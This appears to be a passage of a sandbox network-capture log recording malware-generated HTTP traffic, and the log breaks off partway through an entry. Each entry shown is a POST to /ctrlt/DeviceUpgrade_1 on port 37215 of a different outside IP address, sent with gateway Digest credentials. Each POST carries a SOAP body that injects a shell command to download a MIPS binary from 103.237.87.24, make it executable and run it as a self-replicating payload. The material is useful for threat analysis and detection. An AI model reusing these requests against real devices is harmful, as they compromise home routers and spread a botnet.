62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.133817841.59.26.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055510044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192.168.2.1339502157.145.231.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055510044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192.168.2.133725641.93.76.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055510044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  22192.168.2.1345546157.41.122.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055557966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.1360414222.67.46.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055558920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  24192.168.2.136059241.193.223.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055581093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  25192.168.2.1346174157.71.251.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055582047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  26192.168.2.135062041.251.205.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055583954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  27192.168.2.135717841.106.66.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055588007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  28192.168.2.1344156197.44.109.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055711985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  29192.168.2.1333176197.186.242.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055711985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
